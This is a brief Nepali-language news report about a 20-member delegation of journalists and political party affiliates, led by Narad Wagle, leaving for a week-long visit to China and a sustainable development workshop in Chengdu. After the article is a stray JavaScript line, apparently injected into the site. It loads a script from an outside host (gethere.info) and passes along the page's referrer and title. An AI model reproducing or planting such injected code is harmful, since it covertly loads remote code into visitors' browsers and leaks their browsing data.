पत्रकार र दलका सदस्यहरु चीन प्रस्थान

काठमाडौं, असोज ३० । राजनीतिक विश्लेषक एवम् पत्रकार नारद वाग्ले नेतृत्वको २० सदस्यीय नेपाली प्रतिनिधिमण्डल चीनको साताव्यापी भ्रमणमा आज त्यसतर्फ प्रस्थान गरेको छ ।
प्रतिनिधिमण्डलमा पत्रकारसहित विभिन्न राजनीति दलका भ्रातृ सङ्गठनका सदस्य सहभागी छन् । चाइना डेभलपमेन्ट फोरमको निमन्त्रणामा चीन भ्रमणमा रहेको उक्त टोलीले सिचुवान प्रान्तको छेन्दुमा आयोजना हुने ‘नेपालमा दिगो विकास’ विषयको कार्यशालामा भाग लिने टोली नेता वाग्लेले बताए । नेपाली टोलीले कार्यशालामा कार्यपत्रसमेत प्रस्तुत गर्नेछ ।
प्रतिनिधिमण्डलमा नेकपा (एमाले) केन्द्रीय सदस्य हिक्मत कार्की, गोरखापत्र संस्थानका अध्यक्ष गोविन्द पोखरेल, पत्रकार महेश्वर दाहाल, राजेश अहिराज, सङ्केत कोइराला लगायत छन् ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...